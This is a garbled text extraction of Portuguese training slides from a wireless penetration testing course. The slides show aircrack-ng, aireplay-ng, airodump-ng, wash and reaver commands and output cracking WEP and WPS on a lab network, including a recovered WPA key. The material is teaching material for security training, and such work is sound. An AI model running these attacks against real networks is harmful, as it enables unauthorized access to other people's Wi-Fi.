#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
Pyrit
pyrit benchmark
Running benchmark (1239.9 PMKs/s)... \

pyrit benchmark
Pyrit 0.4.1-dev
#4: 'CPU-Core (svn
(SSE2)': r308)PMKs/s
331.3 (C) 2008-2011
(RTT 3.1) Lukas Lueg http://pyrit.googlecode.com
Running benchmark (1880.5 PMKs/s)... /

#1: 'CUDA-Device #1 'GeForce 320M'': 1588.4 PMKs/s (RTT 2.7)
Ataque ao WPS
Ataque ao WPS
WiFi Protected Setup

Recuperar congurao
PIN
Recongurar AP

Registrar
PIN
# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tac_cal Network Solu_ons, Craig Hener
<chener@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------
48:5B:39:B0:2D:2C 3 -54 1.0 No LABVIRUS
# reaver -i mon0 -b 48:5B:39:B0:D0:2C -v

Reaver v1.4 WiFi Protected Setup Ahack Tool
Copyright (c) 2011, Tac_cal Network Solu_ons, Craig Hener
<chener@tacnetsol.com>

[+] Wai_ng for beacon from 48:5B:39:B0:D0:2C
[+] Associated with 48:5B:39:B0:D0:2C (ESSID: LABVIRUS)
[+] Trying pin 12345670
[+] WPS PIN: '12345670'
[+] WPA PSK: labvirus2013'
[+] AP SSID: LABVIRUS'
Dvidas?
Perguntas?
Cr_cas?
Sugestes?
Siga a Clavis
http://clav.is/slideshare
http://clav.is/twitter
http://clav.is/facebook
Muito Obrigado!
monitoria@clavis.com.br
academia@clavis.com.br
Nelson Murilo
Clavis Segurana da Informao

Clavis Teste de Invasao Sem Fio EAD

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Clavis Teste de Invasao Sem Fio EAD

Uploaded by

Copyright:

Available Formats

Teste

Aulas ao vivo (on line)

wlan4 IEEE 802.11bgn ESSID:off/any

eth4 no wireless extensions.

$ iwlist wlan0 freq

((( Nome da rede )))

((( Nome da rede )))

# iwlist wlan0 scan | egrep "Address|ESSID"

09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)

09:15:42.218638 314us BSSID:00:07:40:4d:1a:5c (oui Unknown) DA:

09:15:42.217642 Retry 218us BSSID:00:07:40:4d:1a:5c (oui Unknown)

# tcpdump -vv -c 3 -i wlan0

# iwconfig wlan0 mode monitor

# tcpdump -c 3 -i mon0 -vv

# iwconfig mon0 channel 11

# tcpdump -c 3 -i mon0 -vv

CH 5 ][ Elapsed: 0 s ][ 2012-03-07 14:39

00:25:9C:36:A0:9F -88 15 18 108 47 5 11e. OPN bsbca

BSSID STATION PWR Rate Lost Frames Probe

grep 00-25-9C /usr/local/etc/aircrack-ng/airodump-ng-oui.txt

Quebra exige captura de grande nmero de pacotes (+5mil)

Vrias ferramentas disponveis

CH 11 ][ Elapsed: 0 s ][ 2012-02-20 11:06

00:07:40:4D:1A:5C -39 0 3 17 8 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 -36 0 20 LABVIRUS

Quebra de chave WEP (vrios _pos de ataques)

Quebra de chave WPA(2)-PSK usando dicionrio

Criao de Access Point falso

Airodump-ng: Visualizao e captura de pacotes

Aircrack-ng: Quebra da chave WEP

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb - [phy48]

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb -

wlan2 Realtek RTL8187L rtl8187 - [phy51]

Interface Chipset Driver

wlan5 Ralink RT2870/3070 rt2800usb - [phy48]

# airmon-ng start wlan5

wlan2 Realtek RTL8187L rtl8187 - [phy51]

wlan2 Realtek RTL8187L rtl8187 - [phy51]

ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,

CH 11 ][ Elapsed: 4 s ][ 2012-02-21 17:01

00:07:40:4D:1A:5C -41 1091 55109 0 0 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -127 0 -1 3 9 LABVIRUS

# aireplay-ng --test mon0

17:33:52 Trying directed probe requests...

# aireplay-ng --arpreplay h mac_cliente e ESSID interface

CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

BSSID STATION PWR Rate Lost Frames Probe

00:07:40:4D:1A:5C 00:21:29:65:B8:45 -14 36 -54 1 128 LABVIRUS

CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

CH 11 ][ Elapsed: 24 s ][ 2012-02-21 17:40

00:07:40:4D:1A:5C -38 100 239 58 1 11 54 WEP WEP LABVIRUS

00:07:40:4D:1A:5C 00:21:29:65:B8:45 0 54 - 1 4042 28810 LABVIRUS

# airmon-ng start wlan5 11

wlan2 Realtek RTL8187L rtl8187 - [phy51]

Esperar uma nova conexo

Forar uma desconexo

Aircrack-ng 1.1 r2076

Failed. Next try with 5000 IVs.